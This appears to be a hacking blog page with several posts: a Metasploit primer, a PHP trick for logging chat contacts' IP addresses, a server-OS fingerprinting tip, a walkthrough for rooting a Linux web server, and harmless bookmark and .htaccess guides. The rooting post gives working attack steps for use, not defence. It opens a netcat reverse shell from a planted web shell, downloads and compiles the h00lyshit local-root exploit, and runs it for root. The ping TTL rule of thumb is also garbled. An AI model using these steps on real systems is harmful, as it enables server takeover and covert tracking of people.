Pages

Subscribe:

Labels

Saturday, 21 April 2012

Metasploit Explained For Beginners




Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world’s largest database of public
, tested exploits. In simple words, Metasploit can be used to test the vulnerability of computer systems in order to protect them and on the other hand it can  alsobe used to break into remote systems. 


Its a powerful tool used for penetration testing. Learning to work with metasploit needs a lot of efforts and time. Ofcourse to can learn metasploit overnight, it needs lots of practice and patience 

Download here(windows user)

Download here(linux user) 32- Bit
Just give a look at following basic steps for beginners to break into a system using metasploit after gathering some information about the target system.

1. Select a right exploit and then set the target.
2.Verify the exploit options to determine whether the target system is vulnerable to the exploit.
3.Select a payload
4.Execute the exploit.

You must be confused !!!!

Now carefully read the following basic terms to get an idea about these four steps mentioned above .I have defined the terms technically and side by side explained in layman language to clarify the things. I have taken an example that an attacker wants to break into a house . I hope my this approach will give you a great idea about these basic terms .

Vulnerability -A weakness which allows an attacker to break into or compromise a system’s security.

Like the main gate of house with a weak lock (can be easily opened) , a glass window of house(can be easily broken) etc can be the vulnerabilities in the systems which make it easy for an attacker to break into.
Exploit - Code which allows an attacker to take advantage of a vulnerability system.

The set of different keys which he can try one by one to open the lock , the hammer with him which he can use to break the glass window etc can be the exploits.
Payload- Actual code which runs on the system after exploitation

Now Finally after exploiting the vulnerability and breaking in , he can have different things to do. He can steal money, destroy the things or just can give a look and come back.. Deciding this is what we mean by setting the Payload.

I hope its enough friends, You will learn more with further tutorials when you will start working with metasploit practically.

-Chacky


How to get anyone's IP address

How to get anyone's IP address




Here's easy trick to find IP addresse of any one ,we can use it to find anyone's Ip easily while chatting in GTalk, Facebook, Yahoo messenger or anywhere else. You can also use it in a E-mail to find the Ip of the Recieptent.

Process:





  • Create a new notepad file on your desktop and name it "ip.txt"
  • Now save it.
  • Now create another text file using notepad and open it. 
  • Copy the Below code from here and paste it there

$file = "ip.txt";$f=fopen($file, 'a');fwrite($f,$_SERVER['REMOTE_ADDR']."\n");fclose($f);?>

  • Now save this txt file with the name" get.php"
  • Now upload both the files "get.php" and "ip.txt" to any free web hosting site. eg. 110mb.com or my3gb.com
  • Now give the link of get.php to anyone .
  • He will get an error " File Not Found."
  • And You got the Ip address !


How to view the Stolen Ip Address..???

Just view the ip.txt file on your uploaded site and you'll get the ip adress of all the peoples who visited your link.

And we all know what can be done with just an IP Address.  ;)
Related Posts Widget for Blogger

-Chacky

Collection of 25000+ SQL Injection Google Dorks

Collection of 25000+ SQL Injection Google Dorks




The almighty Google is just a search engine for common users, but, for hackers this search engine helps them to use Google Dorks (Kinda God Gift For Newbies) :


Google dorks are the center of the Google Hacking. Many hackers use google to find vulnerable webpages and later use these vulnerabilities for hacking.


Many types of Dorks are used for this purpose-
But here I have a vast collection of more than 25000+ SQLi google dorks:-   





Basic SQLi Dorks (2450+ dorks)




Modified SQLi Dorks (4350+ dorks)




Other SQLi Dorks (13000+ dorks)




New SQLi Dorks (4350+ dorks)

How to Save Bookmarks in IE, Firefox, Chrome and Opera

How to Save Bookmarks in IE, Firefox, Chrome and Opera




How would you like to save your bookmarks in IE, Firefox, Opera and Google Chrome so that you can restore them in case if you need to re-install your operating system or move them from one computer to another? This post will show you how to save and restore bookmarks in simple steps.

Bookmarking the favorite web pages can save a lot of time as it becomes almost impossible to remember a list of favorite websites and their URLs. However it can be really frustrating at times when you lose all those saved bookmarks in case if a computer crashes. Also if you are a person who uses more than one computer then it becomes hard to copy all those saved bookmarks one by one manually. So saving the bookmarks can become handy in such situations. Here is how to to do it.
 

Saving a Bookmark file in Internet Explorer

1. From the File menu, select the option Import and Export.
2. Select the option Export to a file and click on Next.
3. In the next screen select Favorites and click on Next.
4. In the next screen again click on Favorites and click on Next.
5. Now choose the destination where you want to save your bookmarks and click onExport.
6. In the next screen click on Finish.
Now you have successfully saved all your bookmarks in a .HTM file. You can use this file to later restore the bookmarks to either IE, Firefox or any other browser. To import the saved bookmarks from a file all you need to do is goto File menu, click on Import and Export, select the option Import from a file and proceed with the screen instructions.
 

Saving a Bookmark file in Firefox

1. From the Bookmarks menu on the top select the option Organize Bookmarks.
2. A window will pop-up. From the window click on Import and Backup at the top and select the option Export HTML.
3. Now choose the destination where you want to save the bookmark file and click onSave.
To restore this saved file, follow the step-1 and in step-2 select the option Import HTMLinstead of Export HTML and proceed.
 

Saving a Bookmark file in Google Chrome

1. From the Tools menu, select Bookmark Manager.
2. Click the Organize menu in the manager.
3. Select Export bookmarks.
4. Select the location where you want your exported file to be saved, then click Save
To restore the bookmarks, follow step-1, step-2 and in step-3 select Import bookmarksinstead of Export bookmarks and proceed.
 

Saving a Bookmark file in Opera

1. From the File menu, select the option Import and Export.
2. Scroll over to the pull-down menu on the right and choose Export Bookmarks as HTML.
3. On the next screen, choose the destination folder from the Save in menu text box at the top of the screen.
4. Just click the Save button and you’re done.

-Chacky

How to know if the web server is Windows or Linux based

How to know if the web server is Windows or Linux based


Its very easy to take on a system if you know the operating system of the server.


Well this is something learn’t from practical experience.


Just follow the given steps:-



1) Goto the link below and find the IP Address of the website you want to gather information about. You may do this by writing its name in the Get IP box

http://www.selfseo.com/find_ip_address_of_a_website.php

(This step was optional just to tell you that it can be done this way also):-P

2)Goto run->type CMD

IN CMD type

ping Target _Website_Name . For Eg- ping google.com

or

ping target_website/computer_ip_address . For Eg:- 59.172.45.1

Now you will see several ping requests coming





Ping Google Server



We Are interested in seeing the TTL time which you can see at the end of each request in ping.

NOTE:-

1) If TTL <64 then the server is Linux based

2) If TTL>64 but <128 then the server is Windows bsaed

3) TTL>128 Mac and others.

From the above screenshot, it is clear that the servers of google are linux based.

Note:- In some Cases you may not get ping replies ( Eg. you try it on your friend’s PC ). Now This can have two reasons, The server is down ie.. The machine is not connected to internet. Else the most common reason, The Firewall is protecting that PC and is not allowing your request to access that system.

Same thing may happen in case of some websites as well, Reason is same.



Caution:- If you are trying this on your friends machine then do not enter the local IP address like 192.168.1.1

Ask him to goto http://whatismyip.com and check the IP address from there.




-Chacky

Server Rooting Tutorial + Using h00lyshit Exploit

Server Rooting Tutorial + Using h00lyshit Exploit






I will show you how to exploit a Linux server and gain root access. This will benefit you in many ways, for example having control of all websites hosted on the server. Enough talking, let's begin!

Requirements for this tutorial:

- A shelled website.
- NetCat installed on your computer.
- Patience
- Port 443 or any other except 80 opened on your router.



Okay, first let's navigate to our shell. If the shell is GNY, you will see something like 'Back Connect'. Go there. Now you see 3 textboxes. Bind to bin/shor backconnect. Type in your IP and the port you want the server to connect (it must be opened on your router.). Now do not press backconnect yet. Download NetCat here:

www.downloadnetcat.com 

Extract the files to your desktop in a folder. Now go to Run>cmd. Open cmd. Now type:

cd

Replace with the path of netcat. Okay, now type:

nc -lnvp

Replace with the port you opened and used on the shell.

Now it should display something like this:

Listening on port [any] ...

Minimze this window, and go on the web shell. Type in your IP address and port, click backconnect. If you did all right, and the server does not have a firewall and if your ports are forwarded correctly, you should see an incoming connection from the server. You have a shell! Now you can type 'id' to see your current ID. Let's say your ID is 23. You have control over your website only. But not for long. Now type 'uname -a'. You will get the full kernel version. Simply copy it and google for local root exploits. Let's say it is 2.6.18 2008 version... Hmm that is pretty outdated! Well, let's exploit it. Cd to the tmp directory, that is always writeable.

Type this:

cd /tmp

Now let's make a folder for the exploit.

mkdir exploit

cd into this folder.

cd exploit

Now comes the tricky part. We will use h00lyshit exploit for this kernel. Type:

wget http://securityvulns.ru/files/h00lyshit.c

(P.S.- If link broken then download h00lyshit exploit here and upload it ti the same site then use it.)

Now type 'ls'. You should see localroot.c in this folder. We need to compile it. Type:

gcc localroot.c -o h00lyshit

Now type 'ls' and you should see 2 files, localroot.c and h00lyshit. h00lyshit requires a large file on the server in order to get root access, so let's create one. Type this and hit enter:

dd if=/dev/urandom of=largefile count=2M

This will create a large file, where largefile is the name of it. This can take up to 5 minutes. Once ready, chmod hoolyshit and largefile to 777, so:

chmod 777 h00lyshit
chmod 777 largefile

Now let's run the exploit! Type this:

./h00lyshit largefile

Now wait, wait for about 3 minutes. If the kernel is not patched and if it is the right version, you are root! Type 'id' and you will see:

uid=0(root)

You have successfully gained root!!

-Chacky


Htaccess File Explained

Htaccess File Explained





Better safe than sorry
The .htaccess gives you a lot of control over what happens on your site but accidents do happen so make sure you keep a backup or best create a copy of the htacess file of the last working .htaccess file you used before attempting to modify it in anyway. This way you can recover quickly from a site crash!
Htaccess is also extremely sensitive. A missing semi colon, incorrect letter or an extra backslash can mess everything up so you need to make sure that what you enter is correct 100%. Don’t let this scare you off though, as long as you take your time and make sure everything is input correctly you can enter just a few lines to htaccess to achieve things which most php scripts take a page to do.
To learn more about htaccess simply click on one of the articles at the right hand side. Good luck :)
How do you edit the .htaccess file?
Before you upload an .htaccess file to your server, make sure there is not already one there. Your host panel or perhaps a script you have uploaded may have already changed the htaccess for some reason so you don’t want to overwrite it as doing so could change something important on your site. For example, in cpanel, you can setup 301 redirects very easily but this tool is simply a script which changes the .htaccess for you. So even though you may not realise it, when you use the redirect script via cpanel, it updates your .htaccess file for you and it’s the .htaccess file which controls the redirect for you (the redirect tool just makes it easier for those who are not familar with .htaccess).
So if there is an .htaccess file there already, you want to download that and edit it before reuploading. This will ensure that nothing you have setup previously is changed.
If there is no .htaccess file there then you need to create one. Thankfully, this is very easy to do. All you need to do is open a text editor and save a blank document as .htaccess. Save the file exactly as it is stated there in bold ie. there is no writing before the extension. You need to save it as .htaccessand not htaccess.txt or document1.htaccess or whatever.
When uploading you should always :
·             Upload in ASCII mode, not binary
·             CHMOD the file to 644 (this isn’t absolutely necessary per say but it’s advisable, it means your server can access it but it can’t be seen via a browser).
Also, after editing your .htaccess file serveral times it may look a little complicated so I recommend adding a comment above the longer parts of code so that you know what each section is for when you look at the file again at a later date. To add a comment to the file you simply start the line with #, any code written after the # in the line will not be executed and is simply a reference for you in the future (and anyone else who may be working on your website ie. co-admin or whatever).

 

Htaccess Supersession

The most common place to upload an .htaccess file is the root ie. the home page of your website. This is because so many things can be controlled from the top level. However, there are many occasions when you will need to upload an .htaccess file to a sub directory. For example, if you want to password protect a directory you need to place the .htaccess file in the directory you want to protect.
The important thing to remember is that any code in a subdirectory .htaccess file supercedes the one in the directory above. However, it only supercedes it when there is a clash. I’ll explain this with an example.
Lets say your root .htaccess and your subdirectory .htaccess file both state how a 404 error should be treated. If someone tries to view a page which has been deleted within the subdirectory then the user will be redirected according to the rule stated in the subdirectory .htaccess file ie. it supercedes the htaccess on the home page. If, however, the user tries to view an incorrect url in the root directory, the root .htaccess file will dictate what will happen.

How to stop someone looking at your htaccess file

One of the first things you want to do is make sure no one tries to look at your .htaccess file. This is actually very easy to do, all you need to do is make use of the Files option.
Just enter the code below to block people seeing your .htaccess file.

# Block people seeing the htaccess file
<Files .htaccess>
order deny,allow
deny from all
</Files>

How to redirect your 404 error to a custom page

A 404 error message is the standard HTTP standard response code which is returned when the visitor cannot communicate with the server. This is a very common error on the web and it occurs when you are trying to visit a page which has either been deleted or has been moved somewhere else. For example, if you change the structure of your website and move a certain directory to a different part of your site, anyone trying to visit the old page url will get a 404 error message.
A 404 error message usually looks something like this :
Not Found
The requested URL /index.php was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.6 Server at yourwebsite.com Port 80
If a visitor comes to your site and sees a standard 404 error message it’s unlikely they will make the effort to see any part of your site. Therefore it is very important to create a 404 page on your site and redirect traffic from incorrect urls.
Thankfully, htaccess makes this very easy. First of all you need to create a 404 error page. So for example, you would create a page at http://www.yoursite.com/404.php which says something like :
It appears you are looking for something which isn’t there. Either you have entered an incorrect URL or we have messed up. Why not visit our home page or alternatively, search for what you are looking for in the search box below.
Whilst a 404 error page does not send the visitor to the exact page they want, it does point them in the right direction and it means they are more likely to stay on your site.
Once you have your 404 page setup, all you need to do is send visitors to incorrect url’s to this page. To do this just add the following line to your .htaccess file :
ErrorDocument 404 /404.php
You can place the 404 error template anywhere you want. For example you could place all error messages in a folder called errormessages
ErrorDocument 404 /errormessages/404.php

 

How to setup a 301 Redirect

A 301 HTTP response status code is a way of telling search engines that a page, pages, directory or entire website has been permanently moved to another place on the web. This is very useful if you have changed the structure of your websites url’s or if you have moved domain. You can also redirect your entire site.
Whereas a 301 code tells search engines that something has been permanently moved, a 302 code tells search engines that something has been temporarily moved. This is useful if you only want to redirect a page for a short period of time. To do a 302 redirect simply change the 301 part to 302.
You can also use 303, which is means ’seeother’ and the page has been replaced by something else. Again, to do this simply substitute 301 with 303 in the tutorials below.
How to setup a 301 Redirect
The basic code for redirecting is :
Redirect 301 old_location new_location
The old location of the file has to be the absolute path from the root of your server. The new location should use http. So for example, if you want to move a file called productreview.html from the root of your site to a subdirectory called products you would use :
Redirect 301 /productreview.html http://www.yoursite.com/products/productreview.html
How to setup a 301 Redirect
If you have moved your domain to another site you may want to redirect the whole site. To so this you simply use the following code :
Redirect 301 / http://www.newdomainname.com/

 

Change the Default Directory Page

When you load a directory on the web, for example www.yoursite.com or www.yoursite.com/articles/, the apache server usually looks for the index.html file. If it can’t find that it will look for index.php or index.cgi. Index.html is usually the page with the highest priority and the one which is loaded first.
It is possible to change the default directory index page. Say, for example, you wanted visitors to go to notice.html instead of index.html. All you have to add to your .htaccess file is
DirectoryIndex notice.html
This can be extended so that the server looks for other files if it cannot find the first one.
DirectoryIndex notice.html index.cgi index.php index.html
Priority goes from left to right. So the server would look for notice.html. If that file is not there it will look for index.cgi, then index.php and then index.html.
You can do to this within any directory on your site. Simply upload an .htaccess file with the above code. Remember, this will supercede the .htaccess file at the root of your domain.

 

Force users to use the WWW or Non-

WWW version of your domain

To avoid duplicate content in search engines you can force users to use either the www or the non-www version of your website domain. This avoids search engines such as Google indexing two versions of your domain, something which is quite common because people link to both www and on-www versions of a domain (known as the www/non-www canonical issue).
It really doesn’t matter if you use www.yoursite.com or yoursite.com. I personally use www on most sites I own however many people prefer to drop it, it’s really up to you.
Force users to use http://www.yoursite.com
To force users to use the www version of your domain all you have to do is add the following code to your .htaccess file (just replace yoursite.com with your domain name).

# Redirect non-www urls to www
RewriteEngine on
RewriteCond %{HTTP_HOST} !^www\.yoursite\.com
RewriteRule (.*) http://www.yoursite.com/$1 [R=301,L]
Alternatively you can use :

# Redirect non-www urls to www
RewriteEngine on
RewriteCond %{HTTP_HOST} ^example\.com [NC]
RewriteRule (.*) http://www.example.com/$1 [R=301,L]
Force users to use http://yoursite.com
To force users to use the non www version of your domain all you have to do is add the following code to your .htaccess file (just replace yoursite.com with your domain name).

# Redirect www urls to non-www
RewriteEngine on
RewriteCond %{HTTP_HOST} ^www\.yoursite\.com [NC]
RewriteRule (.*) http://yoursite.com/$1 [R=301,L]
Alternatively you can use :

# Redirect www urls to non-www
RewriteEngine on
RewriteCond %{HTTP_HOST} !^example\.com
RewriteRule (.*) http://example.com/$1 [R=301,L]
Notes about this technique
Many popular scripts, particular content management systems (CMS’s) edit the .htaccess file and add their own redirection so you may not have to add any of the code noted above. Infact, by adding the redirection code noted above you could actually mess things up.
For example, the popular blogging script WordPress adds redirection to the .htaccess file. You simply chose the correct domain name in the admin panel and it takes care of everything else. And if you do add the code to the .htaccess file it messes things up a little. It does still redirect non-www to www (and vice versa) but it just redirects the visitor to the home page (ie. http://yoursite.com/folder1/page1 would redirect to http://yoursite.com/ instead of http://www.yoursite.com/folder1/page1).
If this sounds a little confusing, don’t worry. Just remember that certain scripts already apply a redirection and so trying to add a redirection code to the .htaccess file can mess things up, at the very least it will unlikely work the way you want it to.

 

Deny a user by IP Address

There may come a time when you unfortunately need to ban someone from visiting your website completely. This is very easy to do using htaccess and can be useful if there is a spammer or disgruntled member attacking your site (something which unfortunately happens a lot to forum and blog owners).
To ban someone completely all you need to do is add the following code to your .htaccess file. Simply replace the ip address below with the ip of the person you want to ban
#ban users from visiting the site
order allow,deny
deny from 123.45.6.7
allow from all
If you want to ban more people you simply add more lines, like this :
#ban users from visiting the site
order allow,deny
deny from 123.45.6.7
deny from 987.65.4.3
deny from 56.45.34.456
allow from all

 

How to Stop Directory Listing

If you have a lot of files in a directory but there is no index file, your server will list all the files in that server. This can cause a lot of problems. For example, one of the most common directories which webmasters forget to hide is the images folder. This allows everyone to view all the images in their images folder. This isn’t usually a major problem though you may have more important files in a directory, perhaps important documents or software.
You can stop this from occurring from using the following code :
IndexIgnore *
The * is a wildcard and stops the server from listing any type of file. You can of course only stop certain files or file types from being listed.
For example :
IndexIgnore *.gif *.jpg *.png accounts.doc
The above code would stop all gif, jpg and png graphics files from being listed. The accounts.doc document would be blocked too however all other .doc files would be shown. Basically the IndexIgnorecommand lets you decide what files in a directory visitors can see.
You can upload an .htaccess file for every directory you want to stop people viewing but it’s more practical to place everything in your main .htaccess file (ie. your root .htaccess). To do this all you need to do is include the path to the folder(s) you want to protect.
So to block people viewing the files at www.yoursite.com/images/ and www.yoursite.com/banners/ you would the following code to your .htaccess
:
IndexIgnore /images/*
IndexIgnore /banners/*

 

Password Protect a Directory

Password protecting a directory is easy to do, all you have to do is :
1.           Add some code to your .htaccess file
2.           Create a file called .htpasswd
3.           Select a username and generate an encrypted password and then add them to your .htpasswd file
Code to add to your Htaccess
You need to add the following code to your .htaccessfile.
AuthType Basic
AuthName "Name of your secure area
AuthUserFile /fullpath/to/your/directory/.htpasswd
require valid-user
You need to edit the file accordingly.
·             Name of your secure area = You can call this anything you want ie. Secure Area or Members Area or whatever.
·             Full Path To Your Directory = This is the absolute path to the directory where your .htpasswd file is saved.
Here’s an example :

AuthType Basic
AuthName "Private Area"
AuthUserFile /home/mysite/.htpasswd
require valid-user
Create a file called .htpasswd
You create a .htpasswd file the same way you created the .htaccess file. All you need to do is create a blank document and save it as .htpasswd.
For security reasons, it is best to place this file above the root of your domain ie. place it in something like /home/mysite/ instead of /home/mysite/public_html.
Create a username and password
The username and password added to your .htpasswd file is in the format :
username:encryptedpassword
So my generated password might be something like
Kevin:nDh54k4Nc.C5c
So how do I encrypt my password in this way? Well there are a number of ways but the quickest and easiest is to use one of the many encryption sites on the web. Just use any of the scripts below to generate your encrypted password.
·             htpasswd encryption
·             .htpasswd Content Generator
Once you have your username and password, simply add the line to your .htaccess file. Now go and test it out and see if your directory is now password protected :)
Some things to note :
·             To give additional users access to a directory simply add another line with a username and encrypted password
·             Only the password is encrypted, the username is not encryped
 
- Chacky